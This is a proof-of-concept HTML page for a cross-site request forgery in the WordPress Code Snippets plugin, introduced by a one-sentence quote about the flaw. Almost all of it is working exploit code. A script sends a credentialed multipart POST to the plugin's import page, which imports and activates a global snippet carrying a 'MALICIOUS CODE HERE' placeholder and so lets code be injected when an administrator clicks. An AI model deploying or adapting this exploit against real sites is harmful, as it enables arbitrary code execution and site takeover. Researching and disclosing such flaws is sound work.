This “flaw allowed anybody to forge a request on behalf of an administrator and inject executable code on a vulnerable site.”
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/waftesting.vhx.cloud:8080\/wp-admin\/admin.php?page=import-snippets", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"duplicate_action\"\r\n" +
"\r\n" +
"ignore\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" +
"Content-Type: application/json\r\n" +
"\r\n" +
"{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-01-23 15:07\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"MALICIOUS CODE HERE",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"save\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"max_file_size\"\r\n" +
"\r\n" +
"2097152\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload files and import\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>